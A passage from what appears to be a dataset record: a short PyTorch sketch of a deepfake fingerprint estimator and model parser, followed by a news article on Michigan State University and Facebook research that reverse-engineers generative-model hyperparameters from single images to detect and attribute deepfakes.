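        self.net = nn.Sequential(
            nn.Conv2d(3, 32, 3, padding=1), nn.ReLU(),
            nn.Conv2d(32, 32, 3, padding=1), nn.ReLU(),
            nn.Conv2d(32, 3, 3, padding=1),
        )

    def forward(self, image):
        return self.net(image)

class ModelParser(nn.Module):
    """Maps an estimated fingerprint to assumed hyperparameters: a vector of
    continuous network-architecture values and a loss-function type."""
    def __init__(self, n_arch_params: int = 15, n_loss_types: int = 8):
        super().__init__()
        self.encoder = nn.Sequential(
            nn.Conv2d(3, 64, 3, stride=2, padding=1), nn.ReLU(),
            nn.Conv2d(64, 128, 3, stride=2, padding=1), nn.ReLU(),
            nn.AdaptiveAvgPool2d(1), nn.Flatten(),
        )
        self.arch_head = nn.Linear(128, n_arch_params)   # regression targets
        self.loss_head = nn.Linear(128, n_loss_types)    # classification logits

    def forward(self, fingerprint):
        feat = self.encoder(fingerprint)
        return self.arch_head(feat), self.loss_head(feat)

# Usage on a dummy batch of images.
images = torch.randn(4, 3, 128, 128)
fingerprints = FingerprintEstimator()(images)
arch_pred, loss_logits = ModelParser()(fingerprints)
print(arch_pred.shape, loss_logits.shape)  # torch.Size([4, 15]) torch.Size([4, 8])
```

Training such a system would require images labeled with the generating model's known hyperparameters, which is consistent with the article's description of a dataset built from 100 publicly available generative models.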
[]
[]
[]
scitechnews
None
None
None
None
A new reverse-engineering approach developed by artificial intelligence experts at Michigan State University (MSU) and Facebook aims to identify and attribute "deepfakes." Facebook's Tal Hassner said, "With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." The researchers tested their approach using a dataset of 100,000 synthetic images produced by 100 publicly available generative models, and found that it outperformed the random baselines of previous detection models. MSU's Xiaoming Liu said, "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." Detecting "deepfakes," in which an existing image or video of a person is manipulated to replace it with someone else's likeness, presents a massive cybersecurity challenge: What could happen when deepfakes are created with malicious intent? Artificial intelligence experts from Michigan State University and Facebook partnered on a new reverse-engineering research method to detect and attribute deepfakes, giving researchers and practitioners tools to better investigate incidents of coordinated disinformation using deepfakes, as well as opening new directions for future research. Technological advancements make it nearly impossible to tell whether an image of a person that appears on social media platforms actually shows a real human. The MSU-Facebook detection method is the first to go beyond standard-model classification methods. "Our method will facilitate deepfake detection and tracing in real-world settings where the deepfake image itself is often the only information detectors have to work with," said Xiaoming Liu, MSU Foundation Professor of computer science. "It's important to go beyond current methods of image attribution because a deepfake could be created using a generative model that the current detector has not seen during its training." The team's novel framework uses fingerprint estimation to predict the network architecture and loss functions of an unknown generative model given a single generated image. The new method, explained in the paper "Reverse Engineering of Generative Models: Inferring Model Hyperparameters from Generated Images," was developed by Liu and MSU College of Engineering doctoral candidate Vishal Asnani, and Facebook AI researchers Xi Yin and Tal Hassner. Solving the problem of proliferating deepfakes requires going beyond current methods - which focus on distinguishing a real image from a deepfake image generated by a model seen during training - to understand how to extend image attribution beyond the limited set of models present in training. Reverse engineering, while not a new concept in machine learning, is a different way of approaching the problem of deepfakes. Prior work on reverse engineering relies on preexisting knowledge, which limits its effectiveness in real-world cases. "Our reverse engineering method relies on uncovering the unique patterns behind the AI model used to generate a single deepfake image," said Facebook's Hassner. "With model parsing, we can estimate properties of the generative models used to create each deepfake, and even associate multiple deepfakes to the model that possibly produced them. This provides information about each deepfake, even ones where no prior information existed." 
To test their new approach, the MSU researchers put together a fake image dataset with 100,000 synthetic images generated from 100 publicly available generative models. The research team mimicked real-world scenarios by performing cross-validation to train and evaluate the models on different splits of datasets. A more in-depth explanation of their model can be seen on Facebook's blog. The results showed that the MSU-Facebook approach performs substantially better than the random baselines of previous detection models. "The main idea is to estimate the fingerprint for each image and use it for model parsing," Liu said. "Our framework can not only perform model parsing, but also extend to deepfake detection and image attribution." In addition to Facebook AI, this study by MSU is based upon work partially supported by the Defense Advanced Research Projects Agency under Agreement No. HR00112090131.